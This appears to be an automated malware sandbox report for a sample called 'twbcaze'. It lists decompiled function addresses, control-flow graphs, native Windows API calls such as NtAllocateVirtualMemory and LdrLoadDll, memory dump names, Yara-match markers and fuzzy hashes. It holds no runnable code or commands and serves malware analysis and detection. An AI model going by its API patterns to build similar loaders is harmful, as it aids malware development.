                                          control_flow_graph 0 41a3d0-41a419 call 41af20 NtReadFile
                                          APIs
                                          • NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A415
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363182622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileRead
                                          • String ID: !JA$bMA$bMA
                                          • API String ID: 2738559852-4222312340
                                          • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                          • Instruction ID: 54437c4e75339082d0912fbe7e6c9053912bd6928cda1a9760da43cab1c95c7d
                                          • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                          • Instruction Fuzzy Hash: C3F0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241D630E8518BA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041A3CA Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 35filenativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 4 41a3ca-41a3cb 5 41a3da-41a419 call 41af20 NtReadFile 4->5 6 41a3cd-41a3ce 4->6 6->5
                                          APIs
                                          • NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A415
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363182622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileRead
                                          • String ID: !JA$bMA$bMA
                                          • API String ID: 2738559852-4222312340
                                          • Opcode ID: 795d799980d892d287fd9b8db69c775aa6b625beaafbfd55f1d0e140686c4f71
                                          • Instruction ID: ca327f79104fa82d58dc4a51924c6610fe60a23fd3e84f6a0e5d2587a75f1dee
                                          • Opcode Fuzzy Hash: 795d799980d892d287fd9b8db69c775aa6b625beaafbfd55f1d0e140686c4f71
                                          • Instruction Fuzzy Hash: 8FF0FEB2600108ABDB04DF99DC80EEB73ADEF8C718F158209FE1DA3241C634E8518BA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040ACE0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 239 40ace0-40acfc 240 40ad04-40ad09 239->240 241 40acff call 41cc10 239->241 242 40ad0b-40ad0e 240->242 243 40ad0f-40ad1d call 41d030 240->243 241->240 246 40ad2d-40ad3e call 41b460 243->246 247 40ad1f-40ad2a call 41d2b0 243->247 252 40ad40-40ad54 LdrLoadDll 246->252 253 40ad57-40ad5a 246->253 247->246 252->253
                                          APIs
                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD52
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363182622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Load
                                          • String ID:
                                          • API String ID: 2234796835-0
                                          • Opcode ID: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
                                          • Instruction ID: 93036d1b31c8ba6342ae8de3f2893f5930aff37f33252288d1eb8296453bc5b5
                                          • Opcode Fuzzy Hash: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
                                          • Instruction Fuzzy Hash: FF015EB5E0020DABDB10EBA1DC42FDEB3789F14308F0041AAE908A7281F634EB54CB95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041A320 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 270 41a320-41a371 call 41af20 NtCreateFile
                                          APIs
                                          • NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A36D
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363182622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                          • Instruction ID: 30690d9e011530b668ed3b4ae7cc5c3fda29d367b226dbf4f68f65ca016a7565
                                          • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                          • Instruction Fuzzy Hash: FDF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041A500 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 273 41a500-41a53d call 41af20 NtAllocateVirtualMemory
                                          APIs
                                          • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B0F4,?,00000000,?,00003000,00000040,00000000,00000000,00409CE3), ref: 0041A539
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363182622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateMemoryVirtual
                                          • String ID:
                                          • API String ID: 2167126740-0
                                          • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                          • Instruction ID: c35769ceed384df61eeb5fc049e905e887b244236103aac277853e7772ac0dd9
                                          • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                          • Instruction Fuzzy Hash: 75F015B2200208ABCB14DF89DC81EEB77ADAF88754F118149BE0897241C630F811CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041A44A Relevance: 1.5, APIs: 1, Instructions: 22nativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 282 41a44a-41a479 call 41af20 NtClose
                                          APIs
                                          • NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A475
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363182622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Close
                                          • String ID:
                                          • API String ID: 3535843008-0
                                          • Opcode ID: 34d64a9403fb7a6a37e3297f96c8564be1be584d940cc82eb9b4c42dcb3ba971
                                          • Instruction ID: 66b807d11c52eaa30fa550aa3b1c1ef6ec778b7e68e66d63534a3927aaaed8be
                                          • Opcode Fuzzy Hash: 34d64a9403fb7a6a37e3297f96c8564be1be584d940cc82eb9b4c42dcb3ba971
                                          • Instruction Fuzzy Hash: E0E0C276200204BFDB20EFA4DC85FD77B28EF48324F104069BA1CDB242C530FA118B90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041A450 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 285 41a450-41a466 286 41a46c-41a479 NtClose 285->286 287 41a467 call 41af20 285->287 287->286
                                          APIs
                                          • NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A475
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363182622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Close
                                          • String ID:
                                          • API String ID: 3535843008-0
                                          • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                          • Instruction ID: e48275ca6f7768b9f0fd4fab79f6d7fda959a909e55c262f35bdb2090c9231ed
                                          • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                          • Instruction Fuzzy Hash: E5D01776200214ABD710EB99DC85EE77BADEF48764F15449ABA189B242C530FA1086E0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 008400C4 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                          • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                          • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                          • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                          • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00840048 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                          • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                          • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                                          • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                          • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00840078 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                          • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                          • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
                                          • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                          • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0083F9F0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                          • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                          • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                          • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                          • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0083F900 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                          • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                          • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                          • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                          • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0083FAD0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                          • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                          • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                          • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                          • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0083FAE8 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                          • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                          • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                          • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                          • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0083FBB8 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                          • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                          • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                          • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                          • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0083FB68 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                          • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                          • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                          • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                          • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0083FC90 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                          • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                          • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                                          • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                          • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0083FC60 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                          • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                          • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                          • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                          • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0083FD8C Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                          • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
